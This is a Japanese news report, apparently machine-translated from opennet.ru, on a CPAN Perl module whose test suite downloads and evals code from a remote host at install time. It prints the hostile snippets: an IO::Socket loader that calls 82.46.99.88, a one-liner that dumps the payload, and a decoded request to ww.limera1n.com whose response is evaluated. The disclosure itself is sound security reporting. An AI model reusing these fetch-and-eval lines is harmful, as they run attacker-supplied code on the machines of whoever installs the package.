CPAN ディレクトリを通じて配布される Perl パッケージ内 、CPAN モジュールをオンザフライで自動的にロードするように設計されており、 悪質なコード。悪意のある挿入は、 テストコード内で 、2011年から出荷されています。
疑わしいコードのロードに関する疑問が生じたことは注目に値します。 2016年に戻った。
悪意のあるアクティビティは、モジュールのインストール時に起動されるテスト スイートの実行中に、サードパーティ サーバー (http://r.cx:1/) からコードをダウンロードして実行しようとする試みに要約されます。最初に外部サーバーからダウンロードされたコードには悪意がなかったと想定されますが、今度はリクエストが ww.limera1n.com ドメインにリダイレクトされ、コードの一部が実行用に提供されます。
ダウンロードをファイルに整理するには 次のコードが使用されます。
私の $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
私の $try = `$^X $prog`;
指定されたコードによりスクリプトが実行されます 、その内容は次の行にまとめられます。
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
このスクリプトはロードされます サービスを利用して 外部ホストからのコード r.cx (文字コード 82.46.99.88 はテキスト "R.cX" に対応) を取得し、それを eval ブロックで実行します。
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″;印刷 <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
解凍後、最終的に以下が実行されます。 :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
問題のあるパッケージはリポジトリから削除されました。 (Perl 作成者アップロード サーバー)、モジュール作成者のアカウントはブロックされています。この場合、モジュールはまだ残っています MetaCPAN アーカイブ内にあり、cpanminus などのユーティリティを使用して MetaCPAN から直接インストールできます。 そのパッケージは広く配布されていなかったということです。
議論するのは興味深い モジュールの作成者は、自分のサイト「r.cx」がハッキングされた後に悪意のあるコードが挿入されたという情報を否定し、ただ楽しんでいただけであり、perlobfuscator.com を使用したのは何かを隠すためではなく、サイズを縮小するためだったと説明しました。コードを削除し、クリップボード経由でのコピーを簡素化します。機能名「ボットストラップ」を選択した理由は、この単語が「ボットのように聞こえ、ブートストラップよりも短い」という事実によって説明されます。モジュールの作成者は、特定された操作は悪意のあるアクションを実行するものではなく、TCP 経由でのコードのロードと実行を示すだけであることも保証しました。
出所: オープンネット.ru